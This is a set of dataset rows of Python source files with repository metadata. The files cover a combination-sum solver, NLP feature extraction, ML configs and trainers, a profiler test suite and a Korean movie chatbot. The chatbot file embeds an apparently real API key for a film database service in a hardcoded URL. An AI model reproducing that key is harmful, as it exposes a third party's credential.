| no_license | sameersaini/hackerank | e30c6270aaa0e288fa8b25392819509849cdabad | 3e66f89e02ade703715237722eda2fa2b135bb79 | refs/heads/master | 2021-06-12T09:24:15.266218 | 2019-10-18T02:22:00 | 2019-10-18T02:22:00 | 31,360,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | def getCombinations(result, combination, candidates, target, startIndex):
if target == 0:
print(sum(combination))
result.append(combination[::])
return
for i in range(startIndex, len(candidates)):
if candidates[i] > target:
break
combination.append(candidates[i])
getCombinations(result, combination, candidates, target - candidates[i], i)
combination.pop()
class Solution:
def combinationSum(self, candidates, target):
if len(candidates) == 0: return []
candidates.sort()
result = []
combination = []
getCombinations(result, combination, candidates, target, 0)
return result
| [
"[email protected]"
]
| |
e593a1aed501a0ba2ff2741d38bd5ecdde517abc | aa3cc5cddf07721962cdd92611daa0198ecc32ea | /nerds/features/rel2bow.py | c6ff2e0bab60aa292a61dbfca21f0c8c69e8a250 | []
| no_license | druv022/Disease-Normalization-with-Graph-Embeddings | 486a7c59d94ff502145796c1921611b937a4006a | c816ba37815d06bea394a99614e07baa3ebed5f2 | refs/heads/master | 2023-02-26T12:55:18.927522 | 2023-02-14T02:36:15 | 2023-02-14T02:36:15 | 242,658,320 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,181 | py | from pathlib import Path
from scipy.sparse import csc_matrix
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from nerds.features.base import RelationFeatureExtractor, UNKNOWN_WORD, UNKNOWN_LABEL, UNKNOWN_POS_TAG, \
UNKNOWN_DEPENDENCY, BOWFeatureExtractor
from nerds.util.file import mkdir
from nerds.util.logging import get_logger
log = get_logger()
KEY = "rel2bow"
class BOWRelationFeatureExtractor(BOWFeatureExtractor, RelationFeatureExtractor):
def __init__(self):
super().__init__()
self.key = KEY
self.word_vectorizer = None
self.label_vectorizer = None
self.pos_vectorizer = None
self.dep_vectorizer = None
def transform(self, X, y=None, relation_labels=None):
log.info("Generating features for {} documents...".format(len(X)))
self.docs_examples = list(self.annotated_documents_to_examples(X, relation_labels=relation_labels))
ent_words = []
ent_labels = []
ent_pos_tags = []
ent_deps = []
rel_labels = []
for doc, examples in self.docs_examples:
for ex in examples:
ent_words += [ex.context["source.text"], ex.context["target.text"]]
ent_labels += [ex.context["source.label"], ex.context["target.label"]]
ent_pos_tags += [ex.context["source.pos"], ex.context["target.pos"]]
ent_deps += [ex.context["dependency"]]
rel_labels += [ex.label]
# add unknown values
ent_words += [UNKNOWN_WORD, UNKNOWN_WORD]
ent_labels += [UNKNOWN_LABEL, UNKNOWN_LABEL]
ent_pos_tags += [UNKNOWN_POS_TAG, UNKNOWN_POS_TAG]
ent_deps += [UNKNOWN_DEPENDENCY]
if not self.word_vectorizer:
# first time run
self.word_vectorizer = CountVectorizer(binary=True)
self.label_vectorizer = CountVectorizer(binary=True)
self.pos_vectorizer = CountVectorizer(binary=True)
self.dep_vectorizer = CountVectorizer(binary=True)
else:
# use vocabularies
self.word_vectorizer = CountVectorizer(binary=True, vocabulary=self.word_vectorizer.vocabulary_)
self.label_vectorizer = CountVectorizer(binary=True, vocabulary=self.label_vectorizer.vocabulary_)
self.pos_vectorizer = CountVectorizer(binary=True, vocabulary=self.pos_vectorizer.vocabulary_)
self.dep_vectorizer = CountVectorizer(binary=True, vocabulary=self.dep_vectorizer.vocabulary_)
ent_words = self._process_unknown_values(
ent_words, self.word_vectorizer.vocabulary, UNKNOWN_WORD)
ent_labels = self._process_unknown_values(
ent_labels, self.label_vectorizer.vocabulary, UNKNOWN_LABEL)
ent_pos_tags = self._process_unknown_values(
ent_pos_tags, self.pos_vectorizer.vocabulary, UNKNOWN_POS_TAG)
ent_deps = self._process_unknown_values(
ent_deps, self.dep_vectorizer.vocabulary, UNKNOWN_DEPENDENCY)
# vectorize
log.info("Vectorizing {} textual entries (words)...".format(len(ent_words)))
word_vectors = self.word_vectorizer.fit_transform(ent_words)
log.info("Vectorizing {} textual entries (labels)...".format(len(ent_labels)))
label_vectors = self.label_vectorizer.fit_transform(ent_labels)
log.info("Vectorizing {} textual entries (POS tags)...".format(len(ent_pos_tags)))
pos_vectors = self.pos_vectorizer.fit_transform(ent_pos_tags)
log.info("Vectorizing {} textual entries (dependency types)...".format(len(ent_deps)))
dep_vectors = self.dep_vectorizer.fit_transform(ent_deps)
# get shapes
n_wor, m_wor = word_vectors.get_shape()
n_lab, m_lab = label_vectors.get_shape()
n_pos, m_pos = pos_vectors.get_shape()
n_dep, m_dep = dep_vectors.get_shape()
# create indices
rows, cols, vals = [], [], []
# ignore the last auxiliary value
for row in range(n_dep - 1):
for col in word_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col]
vals += [1]
for col in word_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + m_pos]
vals += [1]
for col in dep_vectors.getrow(row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + 2 * m_pos]
vals += [1]
# create a sparse matrix of features
log.info("Creating a feature matrix...")
feature_matrix = csc_matrix((vals, (rows, cols)), shape=(n_dep - 1, 2 * m_wor + 2 * m_lab + 2 * m_pos + m_dep))
return feature_matrix, rel_labels
def _process_unknown_values(self, entries, vocabulary, unknown_label):
entries_ref = []
for entry in entries:
known_tokens = []
for token in entry.split():
if token.lower() in vocabulary:
known_tokens += [token]
else:
known_tokens += [unknown_label]
entries_ref += [" ".join(known_tokens)]
return entries_ref
def save(self, file_path):
save_path = Path(file_path)
mkdir(save_path)
words_path = save_path.joinpath("words.dict")
labels_path = save_path.joinpath("labels.dict")
pos_path = save_path.joinpath("pos.dict")
dep_path = save_path.joinpath("dep.dict")
# save dictionaries
# we don't save examples for now
joblib.dump(self.word_vectorizer, words_path)
joblib.dump(self.label_vectorizer, labels_path)
joblib.dump(self.pos_vectorizer, pos_path)
joblib.dump(self.dep_vectorizer, dep_path)
def load(self, file_path):
load_path = Path(file_path)
words_path = load_path.joinpath("words.dict")
labels_path = load_path.joinpath("labels.dict")
pos_path = load_path.joinpath("pos.dict")
dep_path = load_path.joinpath("dep.dict")
# load dictionaries
# we don't load examples for now
self.word_vectorizer = joblib.load(words_path)
self.label_vectorizer = joblib.load(labels_path)
self.pos_vectorizer = joblib.load(pos_path)
self.dep_vectorizer = joblib.load(dep_path)
return self
| [
"[email protected]"
]
| |
402ed76f4050dfce87cdf347cee70aa1d417b2b9 | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/dolby_digital_plus_loudness_control_mode.py | efc53743e4d22e242284b556533a00f56e0a0846 | [
"MIT"
]
| permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 252 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class DolbyDigitalPlusLoudnessControlMode(Enum):
PASSTHROUGH = "PASSTHROUGH"
CORRECTION = "CORRECTION"
| [
"[email protected]"
]
| |
edeaa753730e8d490de3fff90f59fa424ef6082b | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/semantic_segmentation/DeeplabV3_for_Pytorch/configs/pspnet/pspnet_r50-d8_512x1024_80k_cityscapes.py | c1e35bff55747361c0b9e9b26abba13a98faab17 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
]
| permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 827 | py | # Copyright 2021 Huawei
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_base_ = [
'../_base_/models/pspnet_r50-d8.py', '../_base_/datasets/cityscapes.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_80k.py'
]
| [
"[email protected]"
]
| |
de80d3489ba1a197c82a907735c972d03084f4f6 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2942/60622/287831.py | fbe6f1d8ea8915192bb19f7ed0c3080d26918e11 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | n=input()
l=input().split()
l.sort(reverse=True)
for i in l:
print(i,end=" ")
print()
| [
"[email protected]"
]
| |
7196ceabaee7d344102504ba28399e85aea0a3c2 | 60e6ea6af12bb37450dc4f254f953d81623232ce | /databases/venv/Scripts/pip3.8-script.py | 1b7b98beb5faf95df7a500294d4b8556ee0eb4ab | []
| no_license | vedant3598/PyCharm-Projects | 72a48d3e8468949c59675330c12aad1c7a03de41 | 7f49533b9c66de33c6a44e4864b1a639e6bfb0be | refs/heads/master | 2020-12-14T15:37:53.838758 | 2020-01-18T20:11:50 | 2020-01-18T20:11:50 | 233,339,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!C:\Users\vedan\databases\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"[email protected]"
]
| |
b4e33b3180ce6ed1a3986904ec6e74ca3c6384fd | 10d98fecb882d4c84595364f715f4e8b8309a66f | /experience_replay/train.py | 74c4899eac50fc4f53a34183dee9333d07cdb04f | [
"CC-BY-4.0",
"Apache-2.0"
]
| permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,559 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train an agent.
"""
import os
from absl import app
from absl import flags
from dopamine.discrete_domains import run_experiment
import tensorflow.compat.v1 as tf
from experience_replay import run_experience_replay_experiment
flags.DEFINE_string('base_dir', None,
'Base directory to host all required sub-directories.')
flags.DEFINE_multi_string(
'gin_files', [], 'List of paths to gin configuration files (e.g.'
'"third_party/py/dopamine/agents/dqn/dqn.gin").')
flags.DEFINE_multi_string(
'gin_bindings', [],
'Gin bindings to override the values set in the config files '
'(e.g. "DQNAgent.epsilon_train=0.1",'
' "create_atari_environment.game_name="Pong"").')
flags.DEFINE_string(
'schedule', 'continuous_train_and_eval',
'The schedule with which to run the experiment and choose an appropriate '
'Runner. Supported choices are '
'{continuous_train, eval, continuous_train_and_eval}.')
FLAGS = flags.FLAGS
def create_runner(base_dir, create_agent_fn,
schedule='continuous_train_and_eval'):
"""Creates an experiment Runner.
TODO(b/): Figure out the right idiom to create a Runner. The current mechanism
of using a number of flags will not scale and is not elegant.
Args:
base_dir: Base directory for hosting all subdirectories.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym Atari 2600 environment, and returns an agent.
schedule: string, which type of Runner to use.
Returns:
runner: A `run_experiment.Runner` like object.
Raises:
ValueError: When an unknown schedule is encountered.
"""
assert base_dir is not None
# Continuously runs training and eval till max num_iterations is hit.
if schedule == 'continuous_train_and_eval':
return run_experience_replay_experiment.ElephantRunner(
base_dir, create_agent_fn)
else:
raise ValueError('Unknown schedule: {}'.format(schedule))
def launch_experiment(create_runner_fn, create_agent_fn):
"""Launches the experiment.
Args:
create_runner_fn: A function that takes as args a base directory and a
function for creating an agent and returns a `Runner` like object.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym environment, and returns an agent.
"""
run_experiment.load_gin_configs(FLAGS.gin_files, FLAGS.gin_bindings)
runner = create_runner_fn(FLAGS.base_dir, create_agent_fn,
schedule=FLAGS.schedule)
runner.run_experiment()
def main(unused_argv):
"""This main function acts as a wrapper around a gin-configurable experiment.
Args:
unused_argv: Arguments (unused).
"""
tf.logging.set_verbosity(tf.logging.INFO)
launch_experiment(create_runner,
run_experience_replay_experiment.create_agent)
if __name__ == '__main__':
flags.mark_flag_as_required('base_dir')
app.run(main)
| [
"[email protected]"
]
| |
f58c4b1e9c6366deb20e2f21faa02caffaaed02d | 0d4ed26eb44d54238d86eff91f7b45ab62609161 | /arakat-core/pipeline_generator/preprocessing/graph/ParentChecker.py | 5051302aa3e4fa7275085426d9e23e4b27e0a954 | [
"Apache-2.0"
]
| permissive | obalcik/arakat | c8583d8ce4d471df3cf3d9ef4a604307b75c30f5 | 7a8a30708bf8f74de7384c290c035a3a65d3ba47 | refs/heads/master | 2020-03-29T21:36:34.118850 | 2018-11-28T12:18:04 | 2018-11-28T12:18:04 | 150,376,678 | 1 | 0 | Apache-2.0 | 2018-09-26T06:10:08 | 2018-09-26T06:10:08 | null | UTF-8 | Python | false | false | 3,103 | py | from domain.HighLevelNodeTypes import HighLevelNodeTypes
from domain.ErrorTypes import ErrorTypes
from domain.SpecialCases import SpecialCases
def check_parents(cur_nodes, edge_info, nodes):
parent1 = cur_nodes[0]["parent"]
parent2 = cur_nodes[1]["parent"]
# No nodes (except Task nodes) can have a None parent.
if(parent1 is None and parent2 is None):
# Edge between task
return {"parent_type": HighLevelNodeTypes.NO_NODE, "error": ErrorTypes.NO_ERROR}
elif(parent1 is None and parent2 is not None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if(nodes[parent2]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
elif(parent1 is not None and parent2 is None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if (nodes[parent1]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
else:
# Both node have parents.
# Nodes with an edge must have same parents (No Cross Edges).
# -> No edges between inner nodes of different tasks
# -> No edges between inner nodes and nodes under pipeline nodes/cv nodes
# Determine the parent type: Task Node, Pipeline Node or CV Node...
# Special nodes:
# Only allow crossing edges to pipelines from an inner node iff edge carries model
if(parent1 == parent2):
# Siblings of same parents, satisfies conditions above...
# Meta-parent will be used when the parent is pipeline node or cv node.
return {"parent_id": parent1, "parent_type": HighLevelNodeTypes(nodes[parent1]["node_type"]), "meta_parent_id": nodes[parent1]["parent"], "error": ErrorTypes.NO_ERROR}
else:
return __check_special_cases(cur_nodes, edge_info, [nodes[parent1], nodes[parent2]])
def __check_special_cases(cur_nodes, edge_info, parents):
return __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents)
def __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents):
if(parents[0]["node_type"] == HighLevelNodeTypes.TASK_NODE.value and parents[1]["node_type"] == HighLevelNodeTypes.PIPELINE_NODE.value):
if(edge_info["type"]=="model"):
edge_id=cur_nodes[0]["id"] + "-" + cur_nodes[1]["id"]
return {"special_case": {"name": SpecialCases.CROSSING_MODEL_EDGE_TO_PIPELINE, "task_id": parents[0]["id"], "pipeline_id": parents[1]["id"], "model_source_id": cur_nodes[0]["id"], "model_holder_id": cur_nodes[1]["id"], "edge_info": edge_info}, "error": ErrorTypes.NO_ERROR}
else:
# Might add a better name for the error
return {"error": ErrorTypes.NOT_SIBLING_ERROR} | [
"[email protected]"
]
| |
a130e7cbc5096fc05d24b77c1bb957b1e492c07d | f466373b13ae038770990331e0193133d0729caf | /movie_chatbot_server_ver/movie/my_chatbot_textcnn2/Rnn_chatbot/chat.py | 95ab9f0f0589abcc0a1e3a49e074b82312c434ed | []
| no_license | kih1024/chatbot | 92f8a321996707a123bcb90ba10bfd318aabea84 | e2f7741d17e1042c74966dfebc5628a4f4020250 | refs/heads/master | 2018-09-06T16:41:46.515759 | 2018-06-04T15:53:47 | 2018-06-04T15:53:47 | 115,597,558 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,653 | py | import tensorflow as tf
import numpy as np
import math
import sys
from Rnn_chatbot.config import FLAGS
from Rnn_chatbot.model import Seq2Seq
from Rnn_chatbot.dialog import Dialog
import xml.etree.ElementTree as ET
import urllib.request
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
url = "http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieList.xml?key="
key = "2a83ee607d889ae32fca2cf9edbbe573"
url = url + key
class ChatBot:
def __init__(self, voc_path, vector_path, train_dir): #!
self.dialog = Dialog() # dialog 객체 생성
self.dialog.load_vocab(voc_path, vector_path) # dataset에서 문장들을 한 줄씩 읽고 단어장을 초기화해준다. #! chat.voc과 word_embedding.voc을 확인.
self.model = Seq2Seq(self.dialog.vocab_size) # 인코딩, 디코딩 RNN 신경망들을 Deep, Wide하게 만들어주고, 모델을 생성시킨다.
# self.model = Seq2Seq(200)
self.sess = tf.Session() # 세션.. Run 시켜줌.
tf.reset_default_graph() # 초기 그래프 리셋
ckpt = tf.train.get_checkpoint_state(train_dir) # 트레이닝 횟수 저장
self.model.saver.restore(self.sess, ckpt.model_checkpoint_path) # Variable값을 불러와서 초기화해준다.
## 모델 만들고 세션을 실행하는데, 그래프 만들고 나서 다시 받아오기 위해 saver에 저장해둔다.
def run(self, sentence): # 챗봇 구동 $$$$$
# sys.stdout.write("> ")
# sys.stdout.flush()
# line = sys.stdin.readline()
line = sentence # $$$$$
while line:
print(self.get_replay(line.strip())) ###
sys.stdout.write("\n> ")
sys.stdout.flush()
line = sys.stdin.readline()
def decode(self, enc_input, dec_input):
if type(dec_input) is np.ndarray:
dec_input = dec_input.tolist() # 리스트로 변환
# print("enc_input in decode : ", enc_input,"dec_input in decode : ",dec_input)
# TODO: 구글처럼 시퀀스 사이즈에 따라 적당한 버킷을 사용하도록 만들어서 사용하도록
if(len(enc_input) % 5 != 0):
input_len = int(((len(enc_input)//5)+1)*5) # input의 길이를 설정 (5단위로 버켓팅해준다.)
else:
input_len = len(enc_input) # 인코딩 input의 길이가 5의 배수라면 길이 그대로 설정
# dec_input_len = int(((len(dec_input) // 5) + 1) * 5) #decoding input의 길이를 설정 (5단위로 버켓팅해준다.)
# print("input_len : ", input_len)
enc_input, dec_input, _ = self.dialog.transform(enc_input, dec_input,
input_len,
FLAGS.max_decode_len) #패딩과 one-hot vector 생성
return self.model.predict(self.sess, [enc_input], [dec_input]) #세션 실행
def get_replay(self, msg): # msg : 내가 입력한 문장
enc_input = self.dialog.tokenizer(msg, False) #문장에서 단어를 나눠준다.
enc_input = self.dialog.tokens_to_ids(enc_input) #토큰화된 단어에 리스트를 입력으로 넣어준다. 단어사전에 없는 단어는 Unknown처리
dec_input = []
# TODO: 구글처럼 Seq2Seq2 모델 안의 RNN 셀을 생성하는 부분에 넣을것
# 입력값에 따라 디코더셀의 상태를 순차적으로 구성하도록 함
# 여기서는 최종 출력값을 사용하여 점진적으로 시퀀스를 만드는 방식을 사용
# 다만 상황에 따라서는 이런 방식이 더 유연할 수도 있을 듯
curr_seq = 0
for i in range(FLAGS.max_decode_len): #20개까지 output을 낼 수 있다.
# print("enc_input : ", enc_input, " , dec_input : ", dec_input)
outputs = self.decode(enc_input, dec_input) #패딩 및 One-hot vector생성 후 세션 실행
# print("outputs : ", outputs)
if self.dialog.is_eos(outputs[0][curr_seq]): #결과값이 나온다면 break (target)
break
elif self.dialog.is_defined(outputs[0][curr_seq]) is not True: #Pre-defined에 정의되어 있지 않다면
dec_input.append(outputs[0][curr_seq]) #인코딩 결과에 대해서 단어 하나를 디코딩 input값으로 넣어준다.
curr_seq += 1
reply = self.dialog.decode([dec_input], True)
# if self.dialog.keyword :
# utf_keyword = str(self.dialog.keyword[0].encode('utf-8'))[2:-1].replace('\\x', '%')
# real_reply = url + "&movieNm=" + utf_keyword
#
# tree = ET.ElementTree(file=urllib.request.urlopen(real_reply))
# root = tree.getroot()
#
# reply += "\n총 " + str(len(root[1])) + "개의 영화가 있습니다.\n"
#
# count = ""
# for i in range(0, len(root[1])):
# if i < len(root[1]) - 1:
# count = count + root[1][i][1].text + "\n"
# else:
# count = count + root[1][i][1].text + "\n"
#
# reply += count
# self.dialog.keyword = []
return reply
def main(_, sentence): # $$$$$
print("깨어나는 중 입니다. 잠시만 기다려주세요...\n")
chatbot = ChatBot(FLAGS.voc_path, FLAGS.vec_path, FLAGS.train_dir) #! chat.voc, word_embedding.voc을 인자로 넣고, model폴더 안의 데이터들을 확인.
chatbot.run(sentence)
if __name__ == "__main__":
#tf.reset_default_graph()
tf.app.run()
| [
"[email protected]"
]
| |
68a8fa89f93202a0a70bcd74a4cb00d6cd3443ce | 6cbaade56c5db347d1be9a3422a69af52df39b97 | /python_workspace/3_bigdata/02_Standardization_Analysis/1_CSV/3pandas_value_meets_condition.py | 7d6e3720622a55a884ddfd88fa1510ccd7e19c49 | []
| no_license | baewonje/iot_bigdata_- | b54e3772f64b9695efee8632183590628b679e11 | 2ce1af67d2f05abeb2ecd442b7299f349bdb9753 | refs/heads/master | 2020-09-06T09:53:53.018320 | 2019-12-06T08:19:33 | 2019-12-06T08:19:33 | 220,390,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | # 목적: pandas 문법으로 특정 행을 필터링하기
import pandas as pd
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
data_frame = pd.read_csv(input_file)
data_frame['Cost'] = data_frame['Cost'].str.strip('$').astype(float)
data_frame_value_meets_condition = data_frame.loc[(data_frame['Supplier Name'].str.contains('Z')) | (data_frame['Cost'] > 600.0), :]
# loc 내부에 ,를 생략하면 에러발생
data_frame_value_meets_condition.to_csv(output_file, index=False ) | [
"[email protected]"
]
| |
fdaf7031d6c27c7b70b0ded64c5e71e167f1d4ed | 8042163dbac5ddf47f078b4d14f4eb6fe1da030d | /tensorflow/python/profiler/profiler_v2_test.py | 50d29c0532f075d553911327a73af863fb9f1cff | [
"Apache-2.0"
]
| permissive | AITutorials/tensorflow | 4513de8db4e9bb74b784f5ba865ef8a573b9efc1 | 6bee0d45f8228f2498f53bd6dec0a691f53b3c7b | refs/heads/master | 2022-07-29T13:37:23.749388 | 2020-06-11T17:47:26 | 2020-06-11T17:57:06 | 271,615,051 | 3 | 0 | Apache-2.0 | 2020-06-11T18:07:11 | 2020-06-11T18:07:10 | null | UTF-8 | Python | false | false | 4,426 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler import traceme
class ProfilerTest(test_util.TensorFlowTestCase):
def test_profile_exceptions(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with self.assertRaises(errors.AlreadyExistsError):
profiler.start(logdir)
profiler.stop()
with self.assertRaises(errors.UnavailableError):
profiler.stop()
# Test with a bad logdir, and it correctly raises exception and deletes
# profiler.
# pylint: disable=anomalous-backslash-in-string
profiler.start('/\/\/:123')
# pylint: enable=anomalous-backslash-in-string
with self.assertRaises(Exception):
profiler.stop()
profiler.start(logdir)
profiler.stop()
def test_save_profile(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
for file_name in gfile.ListDirectory(logdir):
if gfile.IsDirectory(os.path.join(logdir, file_name)):
self.assertEqual(file_name, 'plugins')
else:
self.assertTrue(file_name.endswith('.profile-empty'))
profile_dir = os.path.join(logdir, 'plugins', 'profile')
run = gfile.ListDirectory(profile_dir)[0]
hostname = socket.gethostname()
overview_page = os.path.join(profile_dir, run,
hostname + '.overview_page.pb')
self.assertTrue(gfile.Exists(overview_page))
input_pipeline = os.path.join(profile_dir, run,
hostname + '.input_pipeline.pb')
self.assertTrue(gfile.Exists(input_pipeline))
tensorflow_stats = os.path.join(profile_dir, run,
hostname + '.tensorflow_stats.pb')
self.assertTrue(gfile.Exists(tensorflow_stats))
kernel_stats = os.path.join(profile_dir, run, hostname + '.kernel_stats.pb')
self.assertTrue(gfile.Exists(kernel_stats))
trace_file = os.path.join(profile_dir, run, hostname + '.trace.json.gz')
self.assertTrue(gfile.Exists(trace_file))
def test_profile_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
profiler.start(logdir, options)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
def test_context_manager_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
with profiler.Profile(logdir, options):
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
]
| |
0a3ce7bc94322d2939e3bc61f528b8c73ede0326 | 0e79ab62d4e433accb7ba29a7145257c4bbba346 | /model/train_interact_tpu.py | c82ec0281216a640ac8595aa3a44e8002b56184e | [
"MIT"
]
| permissive | zeta1999/piglet | 76576fcbd72cba2b7a8e0964b9a984f0cb89d827 | 41fb35a3606415deabb47541e59d9d286c398350 | refs/heads/main | 2023-05-11T04:20:28.684510 | 2021-06-01T00:54:22 | 2021-06-01T00:54:22 | 373,201,430 | 0 | 1 | MIT | 2021-06-02T14:41:05 | 2021-06-02T14:41:04 | null | UTF-8 | Python | false | false | 845 | py | """ Training script! """
import sys
sys.path.append('../')
import tensorflow as tf
from model.neat_config import NeatConfig
from model.interact.modeling import model_fn_builder
from model.interact.dataloader import input_fn_builder
config = NeatConfig.from_args("Train detector script", default_config_file='interact/configs/default_tpu.yaml')
model_fn = model_fn_builder(config)
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=config.device['use_tpu'],
model_fn=model_fn,
config=config.device['tpu_run_config'],
train_batch_size=config.device['train_batch_size'],
eval_batch_size=config.device['val_batch_size'],
predict_batch_size=config.device['val_batch_size'],
# params={},
)
estimator.train(input_fn=input_fn_builder(config, is_training=True),
max_steps=config.optimizer['num_train_steps']) | [
"[email protected]"
]
| |
304e838e3c7304f8a3cada5e5202249be9c5c479 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/duapp2.drexel.edu/TMS.py | 5938794401c1348b9eb96c9578809eba807074c7 | []
